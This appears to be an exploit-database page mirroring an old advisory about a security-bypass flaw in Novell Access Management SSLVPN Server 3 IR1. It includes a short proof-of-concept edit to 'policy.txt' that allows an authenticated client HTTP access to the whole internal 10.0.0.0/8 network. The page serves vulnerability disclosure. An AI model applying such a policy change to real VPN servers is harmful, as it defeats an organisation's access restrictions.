header-logo
Suggest Exploit
vendor:
Novell Access Management Server
by:
Unknown
N/A
CVSS
N/A
Security Bypass
Unknown
CWE
Product Name: Novell Access Management Server
Affected Version From: Version 3 IR1
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Novell Access Management SSLVPN Server security-bypass vulnerability

A remote authenticated attacker can exploit this issue to access corporate resources normally restricted within VPN access policy. This may lead to other attacks.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22787/info

Novell Access Management SSLVPN Server is prone to a security-bypass vulnerability.

A remote authenticated attacker can exploit this issue to access corporate resources normally restricted within VPN access policy. This may lead to other attacks.

This issue affects version 3 IR1 of Novell Access Management Server. 

A proof-of-concept modification to 'policy.txt' would be as follows:

sslize {
from : 0.0.0.0 / 0
to :10.0.0.0/255.0.0.0
port : 80
protocol :tcp
action :allow
};

The above example demonstrates how an attacker would allow their client machine HTTP access to any host on the remote network.

Navigation

Suggest Exploit

Services By CQR